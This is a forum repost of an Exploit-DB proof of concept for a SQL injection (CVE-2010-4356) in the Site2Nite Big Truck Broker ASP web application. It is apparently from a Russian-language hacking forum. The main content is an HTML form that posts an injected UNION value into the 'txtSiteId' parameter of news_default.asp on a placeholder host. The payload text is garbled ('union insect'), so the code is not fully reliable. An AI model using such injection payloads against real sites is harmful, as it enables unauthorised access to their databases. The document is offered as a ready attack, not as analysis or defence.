Exploit Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
15627
Проверка EDB
  1. Пройдено
Автор
UNDERGROUND-STOCKHOLM.COM
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2010-4356
Дата публикации
2010-11-28
HTML:
<!--
Site2Nite Big Truck Broker "txtSiteId" SQL Injection Vulnerability
PRODUCT: Site2Nite Big Truck Broker
PRODUCT URL: http://www.site2nite.com/productdetail.asp?id=14
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
-->
<html>
<body>
<form method="post" action="http://[host]/[path]/news_default.asp">
<input type="text" name="txtSiteId" value="-1 union insect">
<input type="hidden" name="cmdSearchId" value="Go">
<input type="submit">
</form>
</body>
</html>
 
Источник
www.exploit-db.com

Похожие темы